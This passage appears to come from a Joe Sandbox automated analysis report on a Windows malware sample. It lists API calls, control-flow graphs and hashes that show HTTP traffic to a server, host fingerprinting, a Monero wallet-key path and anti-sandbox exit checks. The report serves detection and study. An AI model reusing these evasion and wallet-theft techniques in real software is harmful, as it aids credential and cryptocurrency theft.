                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F663BF
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F663D1
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00F663FD
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F6646D
                                  • InternetCloseHandle.WININET(00000000), ref: 00F664EF
                                  • InternetCloseHandle.WININET(00000000), ref: 00F664F9
                                  • InternetCloseHandle.WININET(00000000), ref: 00F66503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: 98d191d0086e7816e960b6091f635fb7e53c9f4144f282428dac2dd05e125d58
                                  • Instruction ID: eeaf3f96ddc53bd5ee90096879ce2bb5655a02de14f0511cee9e17649ce7a4c9
                                  • Opcode Fuzzy Hash: 98d191d0086e7816e960b6091f635fb7e53c9f4144f282428dac2dd05e125d58
                                  • Instruction Fuzzy Hash: 51714F71A00218ABDB24DFA0DC49FEE7B78BF44700F508199F50AAB1C4DBB56A85DF52

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1090 f75510-f75577 call f75ad0 call f7a820 * 3 call f7a740 * 4 1106 f7557c-f75583 1090->1106 1107 f755d7-f7564c call f7a740 * 2 call f61590 call f752c0 call f7a8a0 call f7a800 call f7aad0 StrCmpCA 1106->1107 1108 f75585-f755b6 call f7a820 call f7a7a0 call f61590 call f751f0 1106->1108 1133 f75693-f756a9 call f7aad0 StrCmpCA 1107->1133 1137 f7564e-f7568e call f7a7a0 call f61590 call f751f0 call f7a8a0 call f7a800 1107->1137 1124 f755bb-f755d2 call f7a8a0 call f7a800 1108->1124 1124->1133 1140 f756af-f756b6 1133->1140 1141 f757dc-f75844 call f7a8a0 call f7a820 * 2 call f61670 call f7a800 * 4 call f76560 call f61550 1133->1141 1137->1133 1144 f756bc-f756c3 1140->1144 1145 f757da-f7585f call f7aad0 StrCmpCA 1140->1145 1270 f75ac3-f75ac6 1141->1270 1149 f756c5-f75719 call f7a820 call f7a7a0 call f61590 call f751f0 call f7a8a0 call f7a800 1144->1149 1150 f7571e-f75793 call f7a740 * 2 call f61590 call f752c0 call f7a8a0 call f7a800 call f7aad0 StrCmpCA 1144->1150 1164 f75865-f7586c 1145->1164 1165 f75991-f759f9 call f7a8a0 call f7a820 * 2 call f61670 call f7a800 * 4 call f76560 call f61550 1145->1165 1149->1145 1150->1145 1250 f75795-f757d5 call f7a7a0 call f61590 call f751f0 call f7a8a0 call f7a800 1150->1250 1172 f75872-f75879 1164->1172 1173 f7598f-f75a14 call f7aad0 StrCmpCA 1164->1173 1165->1270 1174 f758d3-f75948 call f7a740 * 2 call f61590 call f752c0 call f7a8a0 call f7a800 call f7aad0 StrCmpCA 1172->1174 1175 f7587b-f758ce call f7a820 call f7a7a0 call f61590 call f751f0 call f7a8a0 call f7a800 1172->1175 1203 f75a16-f75a21 Sleep 1173->1203 1204 f75a28-f75a91 call f7a8a0 call f7a820 * 2 call f61670 call f7a800 * 4 call f76560 call f61550 1173->1204 1174->1173 1275 f7594a-f7598a call f7a7a0 call f61590 call f751f0 call f7a8a0 call f7a800 1174->1275 1175->1173 1203->1106 1204->1270 1250->1145 1275->1173
                                  APIs
                                    • Part of subcall function 00F7A820: lstrlen.KERNEL32(00F64F05,?,?,00F64F05,00F80DDE), ref: 00F7A82B
                                    • Part of subcall function 00F7A820: lstrcpy.KERNEL32(00F80DDE,00000000), ref: 00F7A885
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F75644
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F756A1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F75857
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F751F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F75228
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F752C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F75318
                                    • Part of subcall function 00F752C0: lstrlen.KERNEL32(00000000), ref: 00F7532F
                                    • Part of subcall function 00F752C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00F75364
                                    • Part of subcall function 00F752C0: lstrlen.KERNEL32(00000000), ref: 00F75383
                                    • Part of subcall function 00F752C0: lstrlen.KERNEL32(00000000), ref: 00F753AE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F7578B
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F75940
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F75A0C
                                  • Sleep.KERNEL32(0000EA60), ref: 00F75A1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: b6574aa2d1d3a3464b626f531b324c793f306d8476f5490b02c78df5097d72f8
                                  • Instruction ID: 4fbdc89efda34ca65533ccedae51125fe962f06232ffcb64d815be9ed4935450
                                  • Opcode Fuzzy Hash: b6574aa2d1d3a3464b626f531b324c793f306d8476f5490b02c78df5097d72f8
                                  • Instruction Fuzzy Hash: 8AE145719101049ACB18FBB0EC52EED7738AF94700F90C52AB51A57095EF786E4AEB93

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1301 f717a0-f717cd call f7aad0 StrCmpCA 1304 f717d7-f717f1 call f7aad0 1301->1304 1305 f717cf-f717d1 ExitProcess 1301->1305 1309 f717f4-f717f8 1304->1309 1310 f719c2-f719cd call f7a800 1309->1310 1311 f717fe-f71811 1309->1311 1312 f71817-f7181a 1311->1312 1313 f7199e-f719bd 1311->1313 1315 f71835-f71844 call f7a820 1312->1315 1316 f71913-f71924 StrCmpCA 1312->1316 1317 f71932-f71943 StrCmpCA 1312->1317 1318 f718f1-f71902 StrCmpCA 1312->1318 1319 f71951-f71962 StrCmpCA 1312->1319 1320 f71970-f71981 StrCmpCA 1312->1320 1321 f7187f-f71890 StrCmpCA 1312->1321 1322 f7185d-f7186e StrCmpCA 1312->1322 1323 f71821-f71830 call f7a820 1312->1323 1324 f718cf-f718e0 StrCmpCA 1312->1324 1325 f7198f-f71999 call f7a820 1312->1325 1326 f718ad-f718be StrCmpCA 1312->1326 1327 f71849-f71858 call f7a820 1312->1327 1313->1309 1315->1313 1348 f71926-f71929 1316->1348 1349 f71930 1316->1349 1350 f71945-f71948 1317->1350 1351 f7194f 1317->1351 1346 f71904-f71907 1318->1346 1347 f7190e 1318->1347 1329 f71964-f71967 1319->1329 1330 f7196e 1319->1330 1332 f71983-f71986 1320->1332 1333 f7198d 1320->1333 1340 f71892-f7189c 1321->1340 1341 f7189e-f718a1 1321->1341 1338 f71870-f71873 1322->1338 1339 f7187a 1322->1339 1323->1313 1344 f718e2-f718e5 1324->1344 1345 f718ec 1324->1345 1325->1313 1342 f718c0-f718c3 1326->1342 1343 f718ca 1326->1343 1327->1313 1329->1330 1330->1313 1332->1333 1333->1313 1338->1339 1339->1313 1355 f718a8 1340->1355 1341->1355 1342->1343 1343->1313 1344->1345 1345->1313 1346->1347 1347->1313 1348->1349 1349->1313 1350->1351 1351->1313 1355->1313
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00F717C5
                                  • ExitProcess.KERNEL32 ref: 00F717D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 353a2534991c73a15520cab88c5c7e98056272416fd0a5102ad6ca909093d94d
                                  • Instruction ID: 9371a09133c0b6891843a2cc7f849812efd46d1f0bb7fcc0fb1d89214a7c7338
                                  • Opcode Fuzzy Hash: 353a2534991c73a15520cab88c5c7e98056272416fd0a5102ad6ca909093d94d
                                  • Instruction Fuzzy Hash: E351B3B5A04209EFCB04DFA4D954BBE77B5BF44300F10C05AE51AA7244DB70D94AEB63

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1356 f77500-f7754a GetWindowsDirectoryA 1357 f77553-f775c7 GetVolumeInformationA call f78d00 * 3 1356->1357 1358 f7754c 1356->1358 1365 f775d8-f775df 1357->1365 1358->1357 1366 f775e1-f775fa call f78d00 1365->1366 1367 f775fc-f77617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 f77619-f77626 call f7a740 1367->1369 1370 f77628-f77658 wsprintfA call f7a740 1367->1370 1377 f7767e-f7768e 1369->1377 1370->1377
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F77542
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F7757F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F77603
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F7760A
                                  • wsprintfA.USER32 ref: 00F77640
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\
                                  • API String ID: 1544550907-3809124531
                                  • Opcode ID: 6410dba910eb03d9e4278e4cbc6bf713e07f7ab5760bb2fc9961b85751b0522c
                                  • Instruction ID: d62ddf076b8183b2a1c024426052e699a510f143c3570b2255528e9d11eaeb74
                                  • Opcode Fuzzy Hash: 6410dba910eb03d9e4278e4cbc6bf713e07f7ab5760bb2fc9961b85751b0522c
                                  • Instruction Fuzzy Hash: E841B4B1D04348ABDB24DF94DC45BEEBBB8EF48700F104099F50967280D7786A84DFA6

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F0618), ref: 00F798A1
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F07E0), ref: 00F798BA
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F0720), ref: 00F798D2
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F07F8), ref: 00F798EA
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F0840), ref: 00F79903
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F8860), ref: 00F7991B
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016E6500), ref: 00F79933
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016E6620), ref: 00F7994C
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F0588), ref: 00F79964
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F05A0), ref: 00F7997C
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F0660), ref: 00F79995
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F0678), ref: 00F799AD
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016E6360), ref: 00F799C5
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F05D0), ref: 00F799DE
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F611D0: ExitProcess.KERNEL32 ref: 00F61211
                                    • Part of subcall function 00F61160: GetSystemInfo.KERNEL32(?), ref: 00F6116A
                                    • Part of subcall function 00F61160: ExitProcess.KERNEL32 ref: 00F6117E
                                    • Part of subcall function 00F61110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F6112B
                                    • Part of subcall function 00F61110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00F61132
                                    • Part of subcall function 00F61110: ExitProcess.KERNEL32 ref: 00F61143
                                    • Part of subcall function 00F61220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F6123E
                                    • Part of subcall function 00F61220: ExitProcess.KERNEL32 ref: 00F61294
                                    • Part of subcall function 00F76770: GetUserDefaultLangID.KERNEL32 ref: 00F76774
                                    • Part of subcall function 00F61190: ExitProcess.KERNEL32 ref: 00F611C6
                                    • Part of subcall function 00F77850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F611B7), ref: 00F77880
                                    • Part of subcall function 00F77850: RtlAllocateHeap.NTDLL(00000000), ref: 00F77887
                                    • Part of subcall function 00F77850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F7789F
                                    • Part of subcall function 00F778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F77910
                                    • Part of subcall function 00F778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00F77917
                                    • Part of subcall function 00F778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00F7792F
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,016F88E0,?,00F8110C,?,00000000,?,00F81110,?,00000000,00F80AEF), ref: 00F76ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F76AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00F76AF9
                                  • Sleep.KERNEL32(00001770), ref: 00F76B04
                                  • CloseHandle.KERNEL32(?,00000000,?,016F88E0,?,00F8110C,?,00000000,?,00F81110,?,00000000,00F80AEF), ref: 00F76B1A
                                  • ExitProcess.KERNEL32 ref: 00F76B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2931873225-0
                                  • Opcode ID: 2f886e82bacb6b433ab60f53b5d54b40bdcd42348b5c2a64208546b125bfb20c
                                  • Instruction ID: 7efaebb9e9342926fd72ba57a4f31b3251b7047f287f1c57855b7a523b04c89f
                                  • Opcode Fuzzy Hash: 2f886e82bacb6b433ab60f53b5d54b40bdcd42348b5c2a64208546b125bfb20c
                                  • Instruction Fuzzy Hash: 543112719002089ADB04F7F0DC56FEE7778AF44340F518526F226A2181DF785945E7A3

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1436 f76af3 1437 f76b0a 1436->1437 1439 f76b0c-f76b22 call f76920 call f75b10 CloseHandle ExitProcess 1437->1439 1440 f76aba-f76ad7 call f7aad0 OpenEventA 1437->1440 1446 f76af5-f76b04 CloseHandle Sleep 1440->1446 1447 f76ad9-f76af1 call f7aad0 CreateEventA 1440->1447 1446->1437 1447->1439
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,016F88E0,?,00F8110C,?,00000000,?,00F81110,?,00000000,00F80AEF), ref: 00F76ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F76AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00F76AF9
                                  • Sleep.KERNEL32(00001770), ref: 00F76B04
                                  • CloseHandle.KERNEL32(?,00000000,?,016F88E0,?,00F8110C,?,00000000,?,00F81110,?,00000000,00F80AEF), ref: 00F76B1A
                                  • ExitProcess.KERNEL32 ref: 00F76B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 6d03f15879381a952d0e8815e9b4a0462829c7a7d123f0cc2a4ae6e275474fb7
                                  • Instruction ID: b5cb1d0d138bb6b63cf32bac709306f1c11f34ae89eea9e0687ff5855f06b503
                                  • Opcode Fuzzy Hash: 6d03f15879381a952d0e8815e9b4a0462829c7a7d123f0cc2a4ae6e275474fb7
                                  • Instruction Fuzzy Hash: 33F03A30940609AAFB10ABA0AC06BBE7B34EF44701F50C526B52BE2185CBB85580EB67

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F64839
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00F64849
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: 74a320bc76376481fe89992f9664291d2886c8660893f3550c0b30c925745685
                                  • Instruction ID: 0f2af87873fafe7feffff9f9c17a3037b505af8165189b059ecb72f714f2b9d0
                                  • Opcode Fuzzy Hash: 74a320bc76376481fe89992f9664291d2886c8660893f3550c0b30c925745685
                                  • Instruction Fuzzy Hash: 05210EB1D00209ABDF14DFA4E945ADE7B74FF45320F108629F929A72C0DB746A05DB91

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F66280: InternetOpenA.WININET(00F80DFE,00000001,00000000,00000000,00000000), ref: 00F662E1
                                    • Part of subcall function 00F66280: StrCmpCA.SHLWAPI(?,016FE4D0), ref: 00F66303
                                    • Part of subcall function 00F66280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F66335
                                    • Part of subcall function 00F66280: HttpOpenRequestA.WININET(00000000,GET,?,016FDA18,00000000,00000000,00400100,00000000), ref: 00F66385
                                    • Part of subcall function 00F66280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F663BF
                                    • Part of subcall function 00F66280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F663D1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F75228
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: 7ed045ef461a5e4275be6dcfc20536687a4874810d39dfc8190c2f229f19aff1
                                  • Instruction ID: 4cdb08f3874c9da947840ac33509c0a98003347e62694314981c48784af3ad7d
                                  • Opcode Fuzzy Hash: 7ed045ef461a5e4275be6dcfc20536687a4874810d39dfc8190c2f229f19aff1
                                  • Instruction Fuzzy Hash: C511EF30910148A6DB18FF64DD52AED7738AF90300F418169F81E5A592EF78AB16E793

                                   Control-flow Graph (image not reproduced; extracted basic blocks and edges)
                                   • 1493: f61220-f61247 call f789b0 GlobalMemoryStatusEx
                                   • 1496: f61273-f6127a
                                   • 1497: f61249-f61271 call f7da00 * 2
                                   • 1499: f61281-f61285
                                   • 1501: f61287
                                   • 1502: f6129a-f6129d
                                   • 1504: f61292-f61294 ExitProcess
                                   • 1505: f61289-f61290
                                   • Edges: 1493->1496, 1493->1497, 1496->1499, 1497->1499, 1499->1501, 1499->1502, 1501->1504, 1501->1505, 1505->1502, 1505->1504
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F6123E
                                  • ExitProcess.KERNEL32 ref: 00F61294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: 34a7da02b2d1bb1d840f23e9bbb8e0461a79c04703b6bbc043e5137888dcc11c
                                  • Instruction ID: af42e9c2da090c2f8fa76473819679de1120d9e4b7e7b5f930e162672ea822ff
                                  • Opcode Fuzzy Hash: 34a7da02b2d1bb1d840f23e9bbb8e0461a79c04703b6bbc043e5137888dcc11c
                                  • Instruction Fuzzy Hash: BE016DB0D40308BAEB10DBE0DC49BAEBB78BF04701F248459E705B62C1D77855859799
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F6112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00F61132
                                  • ExitProcess.KERNEL32 ref: 00F61143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
